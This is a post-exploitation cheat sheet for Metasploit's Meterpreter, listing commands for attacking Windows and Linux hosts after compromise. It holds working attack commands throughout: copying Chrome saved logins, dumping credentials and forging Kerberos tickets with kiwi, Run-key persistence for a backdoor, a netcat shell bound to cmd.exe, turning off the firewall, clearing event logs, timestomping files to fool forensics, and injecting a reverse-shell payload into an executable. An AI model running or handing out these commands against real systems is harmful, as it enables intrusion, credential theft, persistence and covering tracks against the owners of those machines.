(*) POST-EXPLOITATION (*)

______ ______ _____ ____ ___ _ _ __ __

/ ___\ \ / / __ )| ____| _ \|_ _| | | | \/ |
| | \ V /| _ \| _| | |_) || || | | | |\/| |
| |___ | | | |_) | |___| _ < | || |_| | | | |
\____| |_| |____/|_____|_| \_\___|\___/|_| |_|
* CheatSheet *

==========================
meterpreter > download -h
==========================
Usage: download [options] src1 src2 src3 ... destination

Downloads remote files and directories to the local machine.

OPTIONS:

-a Enable adaptive download buffer size

-b Set the initial block size for the download
-c Resume getting a partially-downloaded file
-h Help banner
-l Set the limit of retries (0 unlimits)
-r Download recursively
-t Timestamp downloaded files

EXAMPLES:

download 'c:\\users\\pt\\appdata\\local\\google\\chrome\\user data\\default\\

login data' .

========================
meterpreter > upload -h
========================
Usage: upload [options] src1 src2 src3 ... destination

Uploads local files and directories to the remote machine.

OPTIONS:

-h Help banner
-r Upload recursively

=============================
meterpreter > run scraper -h
=============================
Scraper -- harvest system info including network shares, registry hives and
password hashes
Info is stored in /home/kali/.msf4/logs/scripts/scraper
USAGE: run scraper
OPTIONS:

-h Help menu.

=============================
meterpreter > run winenum -h
=============================
WinEnum -- Windows local enumeration

Retrieves all kinds of information about the system

including environment variables, network interfaces,
routing, user accounts, and much more. Results are
stored in /home/kali/.msf4/logs/scripts/winenum

OPTIONS:

-c Change Access, Modified and Created times of executables that were run on
the target machine and clear the EventLog
-h Help menu.
-m Migrate the Meterpreter Session from it current process to a new cmd.exe
before doing anything
-r Dump, compress and download entire Registry

=================================
meterpreter > timestomp <file> -h
=================================
Usage: timestomp <file(s)> OPTIONS

OPTIONS:

-a Set the "last accessed" time of the file

-b Set the MACE timestamps so that EnCase shows blanks
-c Set the "creation" time of the file
-e Set the "mft entry modified" time of the file
-f Set the MACE of attributes equal to the supplied file
-h Help banner
-m Set the "last written" time of the file
-r Set the MACE timestamps recursively on a directory
-v Display the UTC MACE values of the file
-z Set all four attributes (MACE) of the file

EXAMPLES:

timestomp <file> -v
timestomp <file> -z '01/01/2000 11:21:11'

=====================
meterpreter > reg -h
=====================
Usage: reg [command] [options]
Interact with the target machine's registry.

OPTIONS:
 -d The data to store in the registry value.
-h Help menu.
-k The registry key path (E.g. HKLM\Software\Foo).
-r The remote machine name to connect to (with current process credentials
-t The registry value type (E.g. REG_SZ).
-v The registry value name (E.g. Stuff).
-w Set KEY_WOW64 flag, valid values [32|64].

COMMANDS:

enumkey Enumerate the supplied registry key [-k <key>]

createkey Create the supplied registry key [-k <key>]
deletekey Delete the supplied registry key [-k <key>]
queryclass Queries the class of the supplied key [-k <key>]
setval Set a registry value [-k <key> -v <val> -d <data>]. Use a binary
blob to set binary data with REG_BINARY type (e.g. setval -d ef4ba278)
deleteval Delete the supplied registry value [-k <key> -v <val>]
queryval Queries the data contents of a value [-k <key> -v <val>]

EXAMPLES:

reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v
Evil /t REG_SZ /d "C:\Users\user\backdoor.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
RunOnce" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
RunServices" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
RunServicesOnce" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe"
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d
'C:\windows\system32\nc.exe -lvp 445 -e cmd.exe'

===============================
meterpreter > run gettelnet -h
===============================
Windows Telnet Server Enabler Meterpreter Script
Usage: gettelnet -u <username> -p <password>

OPTIONS:

-e Enable Telnet Server only.

-f Forward Telnet Connection.
-h Help menu.
-p The Password of the user to add.
-u The Username of the user to add.

EXAMPLES:

run gettelnet -e -u new2 -p 123123134FF

===========================
meterpreter > POST MODULES
===========================
 run post/windows/manage/migrate
run post/windows/gather/enum_av
run post/windows/gather/credentials/chrome
run post/windows/gather/enum_chrome
run post/multi/gather/firefox_creds
run post/windows/gather/usb_history
run post/windows/gather/dumplinks
run post/windows/gather/enum_applications
run post/windows/gather/enum_logged_on_users
run post/windows/gather/screen_spy
run windows/manage/rollback_defender_signatures
run post/linux/gather/checkvm

===================
MODULES > EXPLOITS
===================

use exploit/windows/local/persistence_service
use post/windows/manage/persistence_exe
use exploit/windows/local/persistence

===============
Shell Commands
===============

Shutdown Firewall
^^^^^^^^^^^^^^^^^

netsh advfirewall set allprofiles state off

netsh advfirewall firewall add rule name="PortForwarding 80" dir=in
action=allow protocol=TCP localport=80

Clearing Events
^^^^^^^^^^^^^^^
cmd.exe /c wevtutil.exe cl System
cmd.exe /c wevtutil.exe cl Security

SSH Keys
^^^^^^^^
ssh-keygen
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null
cat ~/.ssh/id_rsa.pub
use post/linux/manage/sshkey_persistence

========================
meterpreter > load kiwi
========================

Kiwi Commands
=============
 Command Description
------- -----------
creds_all Retrieve all credentials (parsed)
creds_kerberos Retrieve Kerberos creds (parsed)
creds_livessp Retrieve Live SSP creds
creds_msv Retrieve LM/NTLM creds (parsed)
creds_ssp Retrieve SSP creds
creds_tspkg Retrieve TsPkg creds (parsed)
creds_wdigest Retrieve WDigest creds (parsed)
dcsync Retrieve user account information via DCSync
(unparsed)
dcsync_ntlm Retrieve user account NTLM hash, SID and RID via
DCSync
golden_ticket_create Create a golden kerberos ticket
kerberos_ticket_list List all kerberos tickets (unparsed)
kerberos_ticket_purge Purge any in-use kerberos tickets
kerberos_ticket_use Use a kerberos ticket
kiwi_cmd Execute an arbitary mimikatz command (unparsed)
lsa_dump_sam Dump LSA SAM (unparsed)
lsa_dump_secrets Dump LSA secrets (unparsed)
password_change Change the password/hash of a user
wifi_list List wifi profiles/creds for the current user
wifi_list_shared List shared wifi profiles/creds (requires SYSTEM)

==============================
meterpreter > load peinjector
==============================
meterpreter > injectpe -h
Usage: injectpe -p < windows/meterpreter/reverse_https > -t < c:\target_file.exe >,
-o < lhost=192.168.1.123, lport=4443 >

Inject a shellcode on the target executable.

OPTIONS:

-h Help banner
-o Comma separated list of additional options for payload if needed in
'opt1=val,opt2=val' format.
-p Windows Payload to inject into the targer executable.
-t Path of the target executable to be injected

EXAMPLES:

injectpe -p windows/meterpreter/reverse_tcp -t vncviewer.exe -o

lhost=192.168.92.141,lport=8989

=======================
Msfconsole > Listeners
=======================

Automating the Attack:

set autorunscript post/windows/manage/migrate
set autorunscript multi_console_command -r /home/kali/file